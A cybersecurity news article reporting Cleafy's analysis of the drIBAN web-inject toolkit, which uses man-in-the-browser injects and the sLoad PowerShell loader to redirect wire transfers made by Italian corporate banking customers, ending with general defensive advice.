• Tue. Oct 10th, 2023

Italian Corporate Banking Customers Are Being Targeted by Hackers Using the New Web-Inject Toolkit DrlBAN

Avatar photo

ByEsme Greene

Jun 28, 2023
Italian banking customers with web-inject toolkit
Esme Greene
Latest posts by Esme Greene (see all)

According to Cleafy examiners Federico Valentini and Alessandro Strino, the primary objective of drIBAN fraud activities is to contaminate Windows workstations inside businesses in an effort to change valid banking transfers made by the victims by changing the beneficiary and transferring money to an unauthorized bank account.

Web injects are a well-established method employed by cybercriminals to inject their own scripts into legitimate websites using a man-in-the-browser (MitB) attack, enabling them to intercept traffic between the user’s browser and the server. 

Fraud Operations

The illegal transactions are frequently carried out via a method known as Automated Transfer System (ATS), which may go beyond bank-installed anti-fraud measures and start unlawful wire transfers from the victim’s computer.

According to Cleafy, the year 2021 marked the transformation of the traditional “banking trojan” activity into an advanced persistent threat. Further evidence suggests that the activity cluster coincides with a 2018 campaign run by an actor identified by Proofpoint as TA554 that targeted users in Canada, Italy, and the United Kingdom.

Technical Aspects

The malware loader sLoad uses PowerShell to gather and exfiltrate data from infected systems. Its main goal is to analyze the victim and ascertain whether it is lucrative enough to support a heavier payload, such as the banking trojan Ramnit

By leveraging genuine Windows technologies like PowerShell and BITSAdmin, sLoad exploits living-off-the-land (LotL) tactics to avoid being discovered. A predetermined list of corporate financial institutions can also be checked by the virus to see if the compromised workstation is one of the targets. If so, sLoad continues to spread the infection. 

Cybersecurity Measures

SLoad is particularly hard to find and defend against threat because of its evasion strategy, which uses PowerShell and other legal Windows programs. Strong security practices and routine software updates to fix known vulnerabilities are preventative steps that organizations may take to reduce the probability of a sLoad infection.

Avatar photo

Esme Greene

Esme brings a wealth of knowledge and experience to our website, specializing in all aspects of DarkWeb security. With a deep understanding of the intricate workings of the DarkWeb and its associated cybersecurity risks, Esme curates insightful and informative content for our readers.